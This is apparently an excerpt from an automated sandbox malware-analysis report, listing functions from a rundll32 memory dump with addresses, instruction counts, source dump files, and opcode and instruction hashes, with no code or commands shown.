                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7f2163ffcfd38c6e0e870ce551981352a1395d20844d9407f5fcf05aa4b87c9b
                                                                                                                                                                                                                                                                            • Instruction ID: e2de51981ac34042f4e3967de5098e0b4ebe541be2f6c067a96819a0d1635795
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f2163ffcfd38c6e0e870ce551981352a1395d20844d9407f5fcf05aa4b87c9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE0125494A7D01FEB16973959B91CC7F75CC4751971840CBC0818E0A3D415A84FD25A
                                                                                                                                                                                                                                                                            Function 04AC6898 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 91673003954e61e9abfaed92fe9982aa294b69f75516c0dae7b0ba6faf933419
                                                                                                                                                                                                                                                                            • Instruction ID: a4f8ac935cba260367a9433b5ed32e958fdf086ea19a8d5aa4ae3cf34ea30c73
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91673003954e61e9abfaed92fe9982aa294b69f75516c0dae7b0ba6faf933419
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51E0863124A1515FC310863CE845987FFB5EF9B75435986E6E004C7106C630E883C7D0
                                                                                                                                                                                                                                                                            Function 04AC36B8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0cfa8bbc40a4569aa7e3c07af7d9aef3d38a138ce3fc30ebf22d8fba1c64544d
                                                                                                                                                                                                                                                                            • Instruction ID: c3ef690111511a1ef75ea9c196dbb3b69c9a5c20cd4db55ce536f5ef22b073d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cfa8bbc40a4569aa7e3c07af7d9aef3d38a138ce3fc30ebf22d8fba1c64544d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0ED71F0021A9F8F80EFA999001AEBBF4AF48140B10C56DD919E7200F231AA018BD0
                                                                                                                                                                                                                                                                            Function 04AC3CFF Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cff3eca2bb84d9720101e9765eeb5b68b24fd590ad018186bc45c07c25cd68b4
                                                                                                                                                                                                                                                                            • Instruction ID: bec09b805bf6864a541fb44d5ae1f6aae00eeca0f05282e3e06643efb1862bb1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cff3eca2bb84d9720101e9765eeb5b68b24fd590ad018186bc45c07c25cd68b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E09270D05288DFDB05CB74B85248D7FB5EA0220571080EAD40597252DD306E069751
                                                                                                                                                                                                                                                                            Function 04AC17F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dfa5de42f3352dcaede80efc55de432d2885127552af75e660c63387a46d2438
                                                                                                                                                                                                                                                                            • Instruction ID: c037533928801e6cfd2a47fd5fb4c8722c22f18474bea6d22875a16343babb7e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa5de42f3352dcaede80efc55de432d2885127552af75e660c63387a46d2438
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBD02B3621D7185FD3059358F416455BFBCAB16125314407BEC01872A6CD206C42C3D1
                                                                                                                                                                                                                                                                            Function 04ACC1E0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 77becd2332803be27c853198849132af76048b7351c3645d45139d6fa10b5a96
                                                                                                                                                                                                                                                                            • Instruction ID: 4ec6e668b26903718599b7744a69482625b1b87a49b99d25054520b5913ccea1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77becd2332803be27c853198849132af76048b7351c3645d45139d6fa10b5a96
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE02B3131030447C714775DF00455E7BDAFBC9765B40442EE54687700CE75BC068BE5
                                                                                                                                                                                                                                                                            Function 04AC6AC0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 80ab8e710a01f21a4a341e807853a37652a74820ec02bb478dd5532955a1d7c0
                                                                                                                                                                                                                                                                            • Instruction ID: 40fbcb531fd7b26bc9c9f47b66825528a7f2e7323e4a3c19ed06fed12976327d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80ab8e710a01f21a4a341e807853a37652a74820ec02bb478dd5532955a1d7c0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE0EC753042049FD314DF5DD880CD2BBE9EF592543558199E858CF712D762FD12CB90
                                                                                                                                                                                                                                                                            Function 04AC3CD0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3b6bed49dd73a03fac8e73b3320989ddf1e90f246ea8693e9f93b65cb87b8a5e
                                                                                                                                                                                                                                                                            • Instruction ID: a0d4c43fecb165e230c69ffd5d420e0ca07d18018e0453870553a05a88cacae6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b6bed49dd73a03fac8e73b3320989ddf1e90f246ea8693e9f93b65cb87b8a5e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CD0A93A300134130A04229F741882EB7AFCBCAE63308806FFA0AC3340CF66AC0A17E5
                                                                                                                                                                                                                                                                            Function 04AC3938 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5c98f72b28ae8441eec16eaf9887ba33348caad8e2e08a27b03c7e7df034d949
                                                                                                                                                                                                                                                                            • Instruction ID: ff68cd239c2b84ed8074031b58129254a63212325d12a472f4d5c0ea9d70bce7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c98f72b28ae8441eec16eaf9887ba33348caad8e2e08a27b03c7e7df034d949
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAD09716F8D3502BCB0012F8281828D3FACCB42928F01C0FBED04AB242C824EC4243C5
                                                                                                                                                                                                                                                                            Function 04AC46D8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2eac1d008354a173ba4e6a6ec345e858caf84d6faa874085d3ff0b79f0878958
                                                                                                                                                                                                                                                                            • Instruction ID: f6f78cb5a1f268fdad6ea5bc398aa987105423b44fe8eab71f0893a91d33d311
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2eac1d008354a173ba4e6a6ec345e858caf84d6faa874085d3ff0b79f0878958
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AE0B674E0430CAFCB54EFF9E44459DBBF5EB48301F0081AAE809E7350EA346A458F81
                                                                                                                                                                                                                                                                            Function 04AC3C89 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44c92dfbf2e2c2805c20cf86791a3bff3842500d71e62e1fd99150befb898513
                                                                                                                                                                                                                                                                            • Instruction ID: 41640b0a008468d8c049c32ed9ee40352cb9bc1e9cb8d0c8512d70b210192473
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c92dfbf2e2c2805c20cf86791a3bff3842500d71e62e1fd99150befb898513
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFD0A73075C740CFDF58563564260AC3F65D65158530088DFD80AC3593E91AF41BA741
                                                                                                                                                                                                                                                                            Function 04AC2220 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d266f65c2d0f12906ff99363401b4c6235221e3cd54168c5b5adac6e18586e66
                                                                                                                                                                                                                                                                            • Instruction ID: 7c4a506f87a0e5f86636e3874790da6103bcac0446b5fd824a89dc5f11a813b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d266f65c2d0f12906ff99363401b4c6235221e3cd54168c5b5adac6e18586e66
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26D0A9316803080AF7E827A42601336328C4B40618F90009DEA0C0D0D298A534E08590
                                                                                                                                                                                                                                                                            Function 04AC0C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 07c43d1c55887e30e97beed4d781a73566dc70cdccdcff9fbce70da64c911658
                                                                                                                                                                                                                                                                            • Instruction ID: 440b673e529c62a26360690e3b698beeb5e99b8f114d32dafce57b4210c5eff5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07c43d1c55887e30e97beed4d781a73566dc70cdccdcff9fbce70da64c911658
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25D0233271821C6BD2147654D845E6A7FBDE794261750443BFD0293310DD70FC0587D5
                                                                                                                                                                                                                                                                            Function 04AC3D10 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6b2064d91f451782fe5668075a20720c8a1aca52572a5889aba94e47ffc20403
                                                                                                                                                                                                                                                                            • Instruction ID: 9ca4e9c90fc1e8aa666a40e73798dcca2ba96697a681b971fdef764dc31a2320
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b2064d91f451782fe5668075a20720c8a1aca52572a5889aba94e47ffc20403
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBD01730E00208EF8B08DFB9E90155DBBB9EB44205B1081EAE409E7240EE316E009B91
                                                                                                                                                                                                                                                                            Function 04ACE32A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6b1fe76ad1e7f11d65593f99e22d529b61483109a29e70616fece44a9885565b
                                                                                                                                                                                                                                                                            • Instruction ID: e2b310b951d11a9912a6f661396acdbb023cefd7bdd8823bfc3404775e5864e6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b1fe76ad1e7f11d65593f99e22d529b61483109a29e70616fece44a9885565b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE0123064470ADBDB549FE0C5657AF7771FB44305F204419D411AB244DF74A946CF80
                                                                                                                                                                                                                                                                            Function 04AC2968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dc13237cdfa11c87e55ba149133d42ccf375d1497c3337bc234f898b18c2b693
                                                                                                                                                                                                                                                                            • Instruction ID: cc5c10893067a8e7b7a36652a2abc936dff3ef3273d0dfe6af0642e9544b992f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc13237cdfa11c87e55ba149133d42ccf375d1497c3337bc234f898b18c2b693
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32D05E75D0130CDFCB04DFB4E941A9DFFF9EB45200B2086A5980497224EE307E018B82
                                                                                                                                                                                                                                                                            Function 04AC3C98 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bb80eeef03547c2cf183c9679054d04fb344fc7334257257e12eba859aca1901
                                                                                                                                                                                                                                                                            • Instruction ID: 4ffdcc84b71352193175cb38677318a0f43e270f5c1537e86c6c56e01d260275
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb80eeef03547c2cf183c9679054d04fb344fc7334257257e12eba859aca1901
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65D0C9303182048BCF88DB69E565529B7A9DB8864930088ADA80BC7341EF26F8169B90
                                                                                                                                                                                                                                                                            Function 04AC858F Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aa3d63024a8405c98ad9dde25989019de636862d5f6cd06de712c76fc2556293
                                                                                                                                                                                                                                                                            • Instruction ID: 811ed824b8f0c4584fa9ee95861398e82401d33fa3742596b6ecef6271b23bb0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa3d63024a8405c98ad9dde25989019de636862d5f6cd06de712c76fc2556293
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAC012E680D2C05FDB0286E0081998E7F309F37705F45505AE18169197D0691805D723
                                                                                                                                                                                                                                                                            Function 04AC21E8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6292de7247fb6d756a081f246e9072d3ad8c3fcb4e06e07e0191fde912d406ae
                                                                                                                                                                                                                                                                            • Instruction ID: 2a3b541c6b4f9451a99a8cf9105eca69f89cd30c543eb16571ea3aaf1400b567
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6292de7247fb6d756a081f246e9072d3ad8c3fcb4e06e07e0191fde912d406ae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3C012B54466815ED715472480A03903B116F41204F9984FDC5594E457D63A9497C710
                                                                                                                                                                                                                                                                            Function 04AC0440 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 920af43b307bfa79cc6daa6053272ff65c8ecea5dd09b088298546e2ab612989
                                                                                                                                                                                                                                                                            • Instruction ID: 39b8e04d294b2024439b21e3ccd7be8f193c62176e1fc6d3f60c8ae52b1e58e8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 920af43b307bfa79cc6daa6053272ff65c8ecea5dd09b088298546e2ab612989
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03C04CB3E64614DBD6544F8849886F57761EB71216B8481AE8D044D019A235621BA929
                                                                                                                                                                                                                                                                            Function 04AC46B0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 19a4ec2080259494c81eda5de17dbad2c395a6f0b03155f6e8368a9c7793fbf9
                                                                                                                                                                                                                                                                            • Instruction ID: 161f4562b90d8b05f106102c128d13b5a3cf6a76e172356495d6d5e787b7ec56
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19a4ec2080259494c81eda5de17dbad2c395a6f0b03155f6e8368a9c7793fbf9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42B0927090530CAF8620DAA9980195AB7ACDA0A211B4001D9F90887320D972AA1157D2

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 04ACF7E8 Relevance: 8.9, Strings: 7, Instructions: 150COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$,q$,q$Hq$`]q$`]q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-2326604374
                                                                                                                                                                                                                                                                            • Opcode ID: a0e21f9d293980953d77e351d65d0ee2ba3f79d26ca1ffaec65463abb74498ae
                                                                                                                                                                                                                                                                            • Instruction ID: 3e256a403505653b6419d13bdfa92d7690da509788c47a36597cb528b970b9a8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0e21f9d293980953d77e351d65d0ee2ba3f79d26ca1ffaec65463abb74498ae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4411831B041149FDB685B29A41456D37E7EFCA62132844AFF106DB3A0DE24FC02C7E9
                                                                                                                                                                                                                                                                            Function 04ACF130 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$,q$,q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-1683276628
                                                                                                                                                                                                                                                                            • Opcode ID: 454aa0fc23b2d5c18c7e7eab65e065c82e139dddf20d27ce69af017544f59b56
                                                                                                                                                                                                                                                                            • Instruction ID: b7cc1db336347a2a7d1e2cdf84438d6f0bdad5b23c8a06907cc7a3475d827db7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 454aa0fc23b2d5c18c7e7eab65e065c82e139dddf20d27ce69af017544f59b56
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28414B347002058FDB58DF69C994A6EBBB3BFC9314B258469E5169B3A5DB30EC02CB61
                                                                                                                                                                                                                                                                            Function 04ACC3A0 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
